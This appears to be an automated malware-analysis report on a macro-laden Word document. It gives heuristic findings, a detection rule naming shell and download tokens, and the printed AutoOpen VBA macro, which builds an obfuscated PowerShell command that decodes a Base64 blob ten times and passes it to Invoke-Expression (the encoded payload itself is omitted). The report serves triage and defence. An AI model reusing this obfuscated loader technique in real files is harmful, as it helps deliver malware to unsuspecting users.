MALICIOUS
Risk Score: 112
Heuristics: 6
- VBA project inside OOXML (medium, 3 related findings) [OOXML_VBA]: Document contains a VBA project — VBA macros present
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: Set fso = CreateObject("Scripting.FileSystemObject")
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: Sub AutoOpen()
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 20176 bytes |

SHA-256: dbf0839c3aceae645c690bf48e1ac9d1e8056f5b36358a9ddc297e9db35ed4f4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
383 of 420 identifiers look randomly generated (e.g. 'VWd2VaVFhXR2VXbFNseVZZTlRqV3lX') — consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Dim msgBoXX As Object
Dim XTukL, XCsmNd As String
XTukL = VVV
XCsmNd = Replace("poXXXweXXXrshXXXelXXXl", "XXX", "") & " -Command " & Chr(34) & " $t= " & Chr(39) & XTukL & Chr(39) & ";$x=$t.ToCharArray();[array]::Reverse($x);$n =$t.length;$b='';for($i=0;$i -le $n; $i=$i+2){$b=$b+$x[$i+1]+$x[$i]} for($i=0;$i -lt 10;$i++){$b=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($b))};Invoke-Expression -Command $b" & Chr(34)
savefile XCsmNd
End Sub
Function VVV()
Dim str As String
str = ""
' [several hundred str = str & "..." lines appending chunks of the encoded payload string are not reproduced here]
VVV = str
End Function
Sub savefile(XX)
Dim filePath As String
filePath = "C:\Users\WinUline\AppData\code.txt"
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(filePath)
oFile.WriteLine XX
oFile.Close
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 46080 bytes |

SHA-256: c46a134486ff11c7f833fe44711112aeb3b852be4b5e5da8cdfbc008805dc458
Detection
ClamAV: No threats found
Obfuscation or payload: likely
979 of 1267 identifiers look randomly generated (e.g. 'ZUVFtSaGRreVFJVjJrVE9WQmZuV1xk') — consistent with name-mangling obfuscation.